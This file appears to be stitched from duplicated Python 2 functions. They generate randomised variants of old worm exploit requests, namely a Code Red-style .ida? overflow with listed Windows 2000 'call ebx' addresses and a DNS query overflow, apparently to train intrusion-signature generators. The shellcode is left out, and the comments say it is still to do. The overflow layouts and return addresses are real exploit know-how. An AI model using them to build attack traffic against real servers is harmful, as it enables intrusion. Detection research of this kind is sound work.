def generate(self, count): safe_chars = [chr(i) for i in xrange(256)] for i in string.whitespace: safe_chars.remove(i) safe_chars.remove(chr(0)) samples = [] for i in xrange(count): request = [] request.append('GET /') request.append(random_bytes(701, safe_chars)) this_ra = self.ra + random.randint(-self.modulation, self.modulation) request.append(struct.pack('L', this_ra)) request.append(random_bytes(self.after_ra_len, safe_chars)) request.append(' HTTP/1.1') request.append('\r\n') yield (''.join(request))
def generate(self, count): safe_chars = [chr(i) for i in xrange(256)] for i in string.whitespace: safe_chars.remove(i) safe_chars.remove(chr(0)) samples = [] for i in xrange(count): request = [] request.append('GET /') request.append(random_bytes(701, safe_chars)) this_ra = self.ra + random.randint(-self.modulation, self.modulation) request.append(struct.pack('L', this_ra)) request.append(random_bytes(self.after_ra_len, safe_chars)) request.append(' HTTP/1.1') request.append('\r\n') yield(''.join(request))
def generate(self, count): safe_chars = [chr(i) for i in xrange(256)] # safe_chars = ['a', 'b'] # safe_chars = [x for x in string.printable] for i in string.whitespace: safe_chars.remove(i) safe_chars.remove(chr(0)) samples = [] for i in xrange(count): request = [] request.append('GET /') request.append( random_bytes(random.randrange(1, 10), string.letters)) request.append('.ida?') request.append(random_bytes(222, string.letters)) # NN used in codered, XX in coderedII, CC in eeye example exploit request.append(random.choice(['NN', 'XX', 'CC'])) # not sure about this part. appears to be assembly code in # codered. request.append(random_bytes(15, string.letters)) # codered causes control to jump to a 'call ebx' within a windows dll request.append( random.choice([ # locations of call ebx in win2k sp0 and sp1 '%u41f9%u7800', #0x780041f9 '%u4223%u7800', #0x78004223 '%ucb65%u7801', #0x7801cb65 '%ucbd3%u7801', #0x7801cbd3 (used in actual codered) '%ucf3f%u7801', #0x7801cf3f '%ub23f%u7802', #0x7802b23f ])) request.append(random_bytes(15, string.letters)) request.append('=') request.append(random_bytes(7, string.letters)) request.append(' HTTP/1.0\r\n') # FIXME- still need headers and shellcode yield (''.join(request))
def generate(self, count): safe_chars = [chr(i) for i in xrange(256)] # safe_chars = ['a', 'b'] # safe_chars = [x for x in string.printable] for i in string.whitespace: safe_chars.remove(i) safe_chars.remove(chr(0)) samples = [] for i in xrange(count): request = [] request.append('GET /') request.append(random_bytes(random.randrange(1,10), string.letters)) request.append('.ida?') request.append(random_bytes(222, string.letters)) # NN used in codered, XX in coderedII, CC in eeye example exploit request.append(random.choice(['NN', 'XX', 'CC'])) # not sure about this part. appears to be assembly code in # codered. request.append(random_bytes(15, string.letters)) # codered causes control to jump to a 'call ebx' within a windows dll request.append(random.choice([ # locations of call ebx in win2k sp0 and sp1 '%u41f9%u7800', #0x780041f9 '%u4223%u7800', #0x78004223 '%ucb65%u7801', #0x7801cb65 '%ucbd3%u7801', #0x7801cbd3 (used in actual codered) '%ucf3f%u7801', #0x7801cf3f '%ub23f%u7802', #0x7802b23f ])) request.append(random_bytes(15, string.letters)) request.append('=') request.append(random_bytes(7, string.letters)) request.append(' HTTP/1.0\r\n') # FIXME- still need headers and shellcode yield(''.join(request))
def special_random_bytes(count, safe): buf = [] import random import struct global counter global p while len(buf) < count: if random.random() < p: tmp = struct.pack('H', counter) else: tmp = worm_gen.random_bytes(2, safe) buf.append(tmp[0]) buf.append(tmp[1]) counter += 1 return ''.join(buf[:count])
def _rand_header(): return random_bytes(random.randrange(3,10), string.letters + string.digits) + \ ": " + \ random_bytes(random.randrange(10,20), string.letters + string.digits) + \ "\r\n"
def _rand_header(): return worm_gen.random_bytes(random.randrange(3,10), \ string.letters + string.digits) + ": " + \ worm_gen.random_bytes(random.randrange(10,20), \ string.letters + string.digits) + "\r\n"
def generate(self, count): for i in xrange(count): request = [] bytes = [chr(i) for i in xrange(256)] # DNS ID request.append(random_bytes(2, bytes)) # first bit is 0 to indicate a query. byte = random.choice(range(256)) byte &= ~(0x80) request.append(chr(byte)) # randomly choose 'recursion not available' bit # all other bits should be zero, but not checked # by server # request.append(random.choice(['\x80', '\x00'])) request.append(random_bytes(2, bytes)) # number of entries in question section. 2 in published exploit. # chosen randomly here. # realistically, it can probably only be a relatively small # number though. request.append(random_bytes(2, bytes)) # resource records in the answer section request.append(random_bytes(2, bytes)) # ns resource records in the authority answer section request.append(random_bytes(2, bytes)) # resource records in additional record section # anything but zero request.append(struct.pack("H", random.choice(xrange(1, 2 ** 16)))) # first encoded QNAME (shell code) # technically this needs to be properly encoded. # i.e., a byte indicating length, that many bytes, another byte # indicating length, etc. For signature # generation purposes though, it might as well be random bytes. request.append(random_bytes(256, bytes)) # could be all one QNAME instead of two # request.append(chr(0)) # apparently server doesn't check this value, # so it could actually vary # request.append(chr(0) + chr(1) + chr(0) + chr(1)) request.append(random_bytes(4, bytes)) # second encoded QNAME (part is used as stack frame after overwrite) request.append(random_bytes(62, bytes)) # Hyang-Ah has seen versions without this. # request.append(chr(6) + chr(0) + chr(0) +chr(0)) # two stack addresses. more in actual exploit, # but may not be necessary. # update- Hyang-Ah thinks only one... request.append(random_bytes(2, bytes)) # request.append('\xff\xbf') request.append(random_bytes(2, bytes)) request.append("\xff\xbf") # the rest of the second QNAME request.append(random_bytes(200, bytes)) request.append(chr(0)) # apparently server doesn't check this value, # so it could actually vary # request.append(chr(0) + chr(1) + chr(0) + chr(1)) request.append(random_bytes(4, bytes)) # another encoded field ending with 00. # has 0 length in actual exploit request.append(random_bytes(10, bytes)) request.append(chr(0)) # record type. FIXED request.append(chr(0) + chr(0xFA)) # record class. should be 0x00ff, but not checked by server request.append(random_bytes(2, bytes)) yield "".join(request)
def generate(self, count): for i in xrange(count): request = [] bytes = [chr(i) for i in xrange(256)] # DNS ID request.append(random_bytes(2, bytes)) # first bit is 0 to indicate a query. byte = random.choice(range(256)) byte &= ~(0x80) request.append(chr(byte)) # randomly choose 'recursion not available' bit # all other bits should be zero, but not checked # by server # request.append(random.choice(['\x80', '\x00'])) request.append(random_bytes(2, bytes)) # number of entries in question section. 2 in published exploit. # chosen randomly here. # realistically, it can probably only be a relatively small # number though. request.append(random_bytes(2, bytes)) # resource records in the answer section request.append(random_bytes(2, bytes)) # ns resource records in the authority answer section request.append(random_bytes(2, bytes)) # resource records in additional record section # anything but zero request.append(struct.pack('H', random.choice(xrange(1, 2**16)))) # first encoded QNAME (shell code) # technically this needs to be properly encoded. # i.e., a byte indicating length, that many bytes, another byte # indicating length, etc. For signature # generation purposes though, it might as well be random bytes. request.append(random_bytes(256, bytes)) # could be all one QNAME instead of two # request.append(chr(0)) # apparently server doesn't check this value, # so it could actually vary # request.append(chr(0) + chr(1) + chr(0) + chr(1)) request.append(random_bytes(4, bytes)) # second encoded QNAME (part is used as stack frame after overwrite) request.append(random_bytes(62, bytes)) # Hyang-Ah has seen versions without this. # request.append(chr(6) + chr(0) + chr(0) +chr(0)) # two stack addresses. more in actual exploit, # but may not be necessary. # update- Hyang-Ah thinks only one... request.append(random_bytes(2, bytes)) # request.append('\xff\xbf') request.append(random_bytes(2, bytes)) request.append('\xff\xbf') # the rest of the second QNAME request.append(random_bytes(200, bytes)) request.append(chr(0)) # apparently server doesn't check this value, # so it could actually vary # request.append(chr(0) + chr(1) + chr(0) + chr(1)) request.append(random_bytes(4, bytes)) # another encoded field ending with 00. # has 0 length in actual exploit request.append(random_bytes(10, bytes)) request.append(chr(0)) # record type. FIXED request.append(chr(0) + chr(0xfa)) # record class. should be 0x00ff, but not checked by server request.append(random_bytes(2, bytes)) yield ''.join(request)